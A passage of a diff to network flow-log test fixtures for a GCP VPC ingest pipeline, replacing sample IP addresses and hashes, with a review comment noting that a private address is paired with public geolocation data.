etwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391119800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", "end": "2019-06-14T03:45:37.301953198Z", @@ -95,18 +95,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 173663, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 68 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:e5cZeUPf9fWSqRY+SUSG302spGE=", + "community_id": "1:MxkJSlVhiCttfItp2SdfNMtLgEY=", "bytes": 173663, "name": "default", "transport": "tcp", @@ -128,7 +128,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -165,8 +165,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868386700Z", - "original": "{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391145800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -187,10 +187,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33576, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -204,7 +204,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:06oSJgliwJ21tZTkobvsHx/M+Pc=", + "community_id": "1:FYaJFSEAKLcBCMFoT6sR5TMHf/s=", "bytes": 155707, "name": "default", "transport": "tcp", @@ -227,7 +227,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -263,8 +263,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868391500Z", - "original": "{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391169Z", + "original": 
"{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", "end": "2019-06-14T03:49:51.821143836Z", @@ -287,9 +287,9 @@ "as": { "number": 49505 }, - "address": "192.0.2.23", + "address": "192.168.2.23", "port": 59679, - "ip": "192.0.2.23" + "ip": "192.168.2.23" }, "source": { "address": "10.139.99.242", @@ -303,7 +303,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:E803d6gSw9j7F6zoCo0Ka6fb9Iw=", + "community_id": "1:MRmF95Hv0PHOjUO7gqbVt98osmo=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -318,7 +318,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.23" + "192.168.2.23" ] }, "gcp": { 
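Review bot: The SSH-flow peer is rewritten to `192.168.2.23`, an RFC 1918 private address, while the same event keeps `"as": { "number": 49505 }` and (in the `-339` hunk below) a `dest_location` of Saint Petersburg, so the fixture now describes a non-routable address with public-Internet AS/geo data, which no address-based enrichment would produce. The other peers in this change are moved to `67.43.156.13`/`67.43.156.14`, presumably because that block is the subset the test lookup database supports; this flow should follow the same convention (another host in the `67.43.156.0/24` block, applied consistently to the `address`, `ip`, `related.ip` values and the `dest_ip` inside `event.original`, with `network.community_id` regenerated) rather than switching to a private range. If a private address was chosen deliberately to keep this flow un-enriched, a one-line note in the pipeline test config saying so would stop the next regeneration from "correcting" it. The same substitution appears again for `192.168.2.117` further down and should be treated identically.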
@@ -339,8 +339,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868395300Z", - "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.0.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391173100Z", + "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint 
Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:45.860349247Z", "end": "2019-06-14T03:40:46.031032701Z", @@ -361,9 +361,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50646, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -377,7 +377,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IPqv9ifIl7xO904fG0KpG1HbMz8=", + "community_id": "1:++9/JiESSUdwTGGcxwXk4RA0lY8=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -392,7 +392,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -416,8 +416,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868398800Z", - "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391177600Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:36.895188084Z", "end": "2019-06-14T03:40:37.048196137Z", @@ -444,17 +444,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50646, "bytes": 1464, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IPqv9ifIl7xO904fG0KpG1HbMz8=", + "community_id": "1:++9/JiESSUdwTGGcxwXk4RA0lY8=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -468,7 +468,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -493,8 +493,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868402Z", - "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391183100Z", + "original": 
"{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:36.895188084Z", "end": "2019-06-14T03:40:37.048196137Z", @@ -521,18 +521,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 186151, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:yZywQ4jpdohOQ9684uKWIPHHP4Y=", + "community_id": "1:pWEbJIgG8triE8M05SRo2qQc0c8=", "bytes": 186151, "name": "default", "transport": "tcp", @@ -554,7 +554,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -591,8 +591,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868405200Z", - "original": "{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391187800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -613,10 +613,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -630,7 +630,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ee5EHtJfWgzMQEQZSyTFAwZbgus=", + "community_id": "1:NAY9D1IuyJAG+Hm34t3LIlP6/4c=", "bytes": 15169, "name": "default", "transport": "tcp", @@ -653,7 +653,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -689,8 +689,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868408500Z", - "original": "{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391191600Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", "end": "2019-06-14T03:49:51.821308944Z", @@ -717,18 +717,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 250864, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 247 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:9htI9XhB+GFEM8rmtAiskiLz++Y=", + "community_id": "1:inP0peZrjQuMumAL2dZH5u0O354=", "bytes": 250864, "name": "default", "transport": "tcp", @@ -750,7 +750,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -787,8 +787,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868411600Z", - "original": "{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391196Z", + "original": 
